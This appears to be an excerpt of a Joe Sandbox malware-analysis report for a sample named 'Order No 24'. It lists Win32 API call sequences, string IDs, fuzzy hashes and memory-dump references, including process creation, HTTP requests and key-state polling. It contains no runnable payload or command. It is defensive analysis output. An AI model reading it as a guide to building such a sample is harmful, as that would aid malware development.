• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009E9C98
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009E9C9B
• GetWindowLongW.USER32(?,000000F0), ref: 009E9CBF
• _memset.LIBCMT ref: 009E9CD0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009E9CE2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009E9D5A
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009B94FE
• SafeArrayAllocData.OLEAUT32(?), ref: 009B9549
• VariantInit.OLEAUT32(?), ref: 009B955B
• SafeArrayAccessData.OLEAUT32(?,?), ref: 009B957B
• VariantCopy.OLEAUT32(?,?), ref: 009B95BE
• SafeArrayUnaccessData.OLEAUT32(?), ref: 009B95D2
• VariantClear.OLEAUT32(?), ref: 009B95E7
• SafeArrayDestroyData.OLEAUT32(?), ref: 009B95F4
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B95FD
• VariantClear.OLEAUT32(?), ref: 009B960F
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009B961A
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
  • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
• CoInitialize.OLE32 ref: 009DADF6
• CoUninitialize.OLE32 ref: 009DAE01
• CoCreateInstance.OLE32(?,00000000,00000017,00A0D8FC,?), ref: 009DAE61
• IIDFromString.OLE32(?,?), ref: 009DAED4
• VariantInit.OLEAUT32(?), ref: 009DAF6E
• VariantClear.OLEAUT32(?), ref: 009DAFCF
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 009D8168
• inet_addr.WSOCK32(?,?,?), ref: 009D81AD
• gethostbyname.WSOCK32(?), ref: 009D81B9
• IcmpCreateFile.IPHLPAPI ref: 009D81C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009D8237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009D824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 009D82C2
• WSACleanup.WSOCK32 ref: 009D82C8
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• _memset.LIBCMT ref: 009E9E5B
• CreateMenu.USER32 ref: 009E9E76
• SetMenu.USER32(?,00000000), ref: 009E9E85
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E9F12
• IsMenu.USER32(?), ref: 009E9F28
• CreatePopupMenu.USER32 ref: 009E9F32
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009E9F63
• DrawMenuBar.USER32 ref: 009E9F71
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
APIs
• SetErrorMode.KERNEL32(00000001), ref: 009CE396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009CE40C
• GetLastError.KERNEL32 ref: 009CE416
• SetErrorMode.KERNEL32(00000000,READY), ref: 009CE483
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                  • Opcode ID: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                                                                                                                  • Instruction ID: 1beb08af9addf994ab4e69314735b3fb98519c507b187a1eed8b8948cad118dd
                                                                                                                                  • Opcode Fuzzy Hash: 729ea0fda1243656dbdc2cc77539087129beb623d9f09de77029af6c49da42da
                                                                                                                                  • Instruction Fuzzy Hash: 2F315436E00209AFDB05EBA4D945FBDB7B8FF44304F148419F506EB2A1DB749946CB52
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009BB98C
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009BB997
                                                                                                                                  • GetParent.USER32 ref: 009BB9B3
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BB9B6
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BB9BF
                                                                                                                                  • GetParent.USER32(?), ref: 009BB9DB
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BB9DE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                  • Opcode ID: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                                                                                                                  • Instruction ID: 04a05984ee7080f5e6afb7e5730731ba1ba7653eed6139fff060ad44674a931b
                                                                                                                                  • Opcode Fuzzy Hash: 901c44cf9f938b3a1fffa1a90ffaef4a906c70f7062eca797d5f20f3a8c4b1b5
                                                                                                                                  • Instruction Fuzzy Hash: 6B2162B5900108BFDB04EBA4CC85EFEB7B9AF45314F10411AF551972D1DBB55916DB20
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009BBA73
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009BBA7E
                                                                                                                                  • GetParent.USER32 ref: 009BBA9A
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009BBA9D
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BBAA6
                                                                                                                                  • GetParent.USER32(?), ref: 009BBAC2
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 009BBAC5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1383977212-1403004172
                                                                                                                                  • Opcode ID: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                                                                                                                  • Instruction ID: ee029e6a49cc657cde5a03b33ec313253c30c034e509d3a026dcf531dbfa6317
                                                                                                                                  • Opcode Fuzzy Hash: f5c38d4383be20d2641b904d7455eda2362ef4cdc279d3d225bb4e6a5acf20b8
                                                                                                                                  • Instruction Fuzzy Hash: 33217FB5A40108BBDB01EBA4CC85FFEBBB9EF45310F10401AF551A7292DBB9591A9B20
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 009BBAE3
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 009BBAF8
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BBB0A
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009BBB85
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  • Opcode ID: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                                                                                                                  • Instruction ID: c525345b4d4c3c84c4cd49f9edf6c2f0f99cde4a50312a7511787d21c657af9a
                                                                                                                                  • Opcode Fuzzy Hash: 744b91c7082103a1e2d06c39e5943a85d9738b4704fb58cbdf05f3f1887b17fa
                                                                                                                                  • Instruction Fuzzy Hash: F4112977A48317FEFA206630DC07EE6379CAB91774F200022F904E50D5EFE6A8125654
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DB2D5
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009DB302
                                                                                                                                  • CoUninitialize.OLE32 ref: 009DB30C
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 009DB40C
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 009DB539
                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 009DB56D
                                                                                                                                  • CoGetObject.OLE32(?,00000000,00A0D91C,?), ref: 009DB590
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 009DB5A3
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009DB623
                                                                                                                                  • VariantClear.OLEAUT32(00A0D91C), ref: 009DB633
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                                                                                                                  • Instruction ID: d2f6e7f2afa63c56f99ffb7d5d47931b87c64dbb58e6b9c72d3d45b8944af156
                                                                                                                                  • Opcode Fuzzy Hash: dc297bc409e370f42f383d93b1319fe0efa12cdc421fdc35f954371e408d44d6
                                                                                                                                  • Instruction Fuzzy Hash: 96C11471608305EFC700DFA4C884A6AB7E9BF89344F05891EF58A9B361DB71ED06CB52
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 009C67FD
                                                                                                                                  • __swprintf.LIBCMT ref: 009C680A
                                                                                                                                    • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 009C6834
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 009C6840
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 009C684D
                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 009C686D
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 009C687F
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 009C688E
                                                                                                                                  • LockResource.KERNEL32(?), ref: 009C689A
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009C68F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1433390588-0
                                                                                                                                  • Opcode ID: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                                                                                                                  • Instruction ID: aefe19f826c290228c45f96880119b1e0ee9258f6c72338ca08959f1dbc8c796
                                                                                                                                  • Opcode Fuzzy Hash: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                                                                                                                  • Instruction Fuzzy Hash: D1316D7690021AABDB11DFA0DD45EBA7BACEF49381F008429F902E2150E774D952DBA1
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0099B496
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                                                                                                                  • GetClientRect.USER32(?), ref: 009FDD63
                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 009FDD7A
                                                                                                                                  • GetWindowDC.USER32(?), ref: 009FDD86
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009FDD95
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009FDDA7
                                                                                                                                  • GetSysColor.USER32(00000005), ref: 009FDDC5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3430376129-0
APIs
• EnumChildWindows.USER32(?,009BCF50), ref: 009BCE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009830DC
• CoUninitialize.OLE32(?,00000000), ref: 00983181
• UnregisterHotKey.USER32(?), ref: 009832A9
• DestroyWindow.USER32(?), ref: 009F5079
• FreeLibrary.KERNEL32(?), ref: 009F50F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 009F5125
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 0099CC15
  • Part of subcall function 0099CCCD: GetClientRect.USER32(?,?), ref: 0099CCF6
  • Part of subcall function 0099CCCD: GetWindowRect.USER32(?,?), ref: 0099CD37
  • Part of subcall function 0099CCCD: ScreenToClient.USER32(?,?), ref: 0099CD5F
• GetDC.USER32 ref: 009FD137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009FD14A
• SelectObject.GDI32(00000000,00000000), ref: 009FD158
• SelectObject.GDI32(00000000,00000000), ref: 009FD16D
• ReleaseDC.USER32(?,00000000), ref: 009FD175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009FD200
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
  • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
  • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
  • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
  • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 009EED3C
• ImageList_EndDrag.COMCTL32 ref: 009EED42
• ReleaseCapture.USER32 ref: 009EED48
• SetWindowTextW.USER32(?,00000000), ref: 009EEDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009EEE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 009EEEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D45FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009D462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009D466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009D4682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009D46BF
• InternetCloseHandle.WININET(00000000), ref: 009D4706
  • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A1DC00), ref: 009DB715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A1DC00), ref: 009DB749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009DB8C1
• SysFreeString.OLEAUT32(?), ref: 009DB8EB
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 009E24F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E2688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E26AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E26EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009E28A1
• CloseHandle.KERNEL32(?), ref: 009E28D0
• CloseHandle.KERNEL32(?), ref: 009E2947
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4090791747-0
                                                                                                                                  • Opcode ID: a83d3873d88edf751779a0f13255feacdc22a21a2754c27e7b28fbe7821338f7
                                                                                                                                  • Instruction ID: ac3756fe49dded4a4752c0b0236010fca51c6f6556a1f46eec7fa6de55a5097a
                                                                                                                                  • Opcode Fuzzy Hash: a83d3873d88edf751779a0f13255feacdc22a21a2754c27e7b28fbe7821338f7
                                                                                                                                  • Instruction Fuzzy Hash: F3D1AE31604241DFCB15EF25C891B6ABBE9BF84310F18895DF8999B3A2DB31EC41CB52
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009EB3F4
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
• Instruction ID: b9b9cc20fd86077c64c1ef6099c25b76cf75b42953c50c91d5d7c4bf33946e48
• Opcode Fuzzy Hash: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
• Instruction Fuzzy Hash: 3B51D631601288BFEF229F6ACC86BAF7B68EB45314F244411F614D61E2DB75ED50CB50
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009FDB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009FDB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009FDB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009FDB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009FDB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0099A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 009FDBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009FDBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,0099A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 009FDBC8
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
• Instruction ID: d35cf01531ce676905148b5a901e125a71ad0edf54a25ab891188836747e0c8f
• Opcode Fuzzy Hash: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
• Instruction Fuzzy Hash: 1A519A34A01208EFDF20DFA8CC82FAA77B9EB58750F110518FA4697290D7B4ED81DB90
APIs
  • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
  • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
  • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
• lstrcmpiW.KERNEL32(?,?), ref: 009C75CA
• _wcscmp.LIBCMT ref: 009C75E2
• MoveFileW.KERNEL32(?,?), ref: 009C75FB
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
